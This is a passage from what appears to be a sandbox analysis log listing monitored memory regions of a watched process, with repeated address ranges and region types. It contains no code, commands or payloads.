region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12522 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12523 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12524 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12525 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12526 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12527 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12528 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12529 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12530 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12531 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12532 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12533 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12534 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12535 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12536 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12537 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12538 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12539 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12540 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12541 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12542 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12543 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12544 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12545 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12546 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12547 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12548 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12549 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 12550 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 12551 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12552 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12553 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12554 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12555 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12556 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12557 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12558 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12559 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12560 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12561 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12562 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12563 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12564 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12565 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12566 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12567 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12568 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12569 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12570 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12571 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12572 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12573 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12574 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12575 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12576 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12577 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12578 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12579 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12580 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12581 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12582 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12583 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12584 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12585 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12586 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12587 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12588 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12589 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12590 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12591 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12592 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12593 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12594 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12595 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12596 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12597 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12598 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12599 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12600 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12601 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12602 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 12603 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 12604 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12605 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12606 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 12607 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 12608 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12609 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12610 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12611 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12612 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12613 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12614 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12615 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12616 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12617 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12618 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12619 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12620 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12621 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12622 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12623 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12624 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 12625 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 12626 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12627 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12628 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12629 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12630 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12631 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12632 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12633 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12634 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12635 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12636 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12637 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12638 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12639 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12640 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12641 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12642 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12643 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12644 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12645 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12646 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12647 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12648 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12649 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12650 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12651 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12652 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12653 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12654 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12655 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12656 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12657 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12658 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12659 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12660 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12661 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12662 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12663 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12664 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12665 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12666 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12667 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12668 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12669 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12670 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12671 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12672 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12673 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12674 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12675 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12676 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12677 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12678 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12679 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12680 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12681 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12682 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12683 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12684 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12685 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12686 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12687 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12688 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12689 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12690 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12691 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 12692 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 12693 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12694 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12695 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12696 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12697 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12698 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12699 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12700 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12701 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12702 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12703 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12704 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12705 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12706 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12707 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12708 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12709 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type 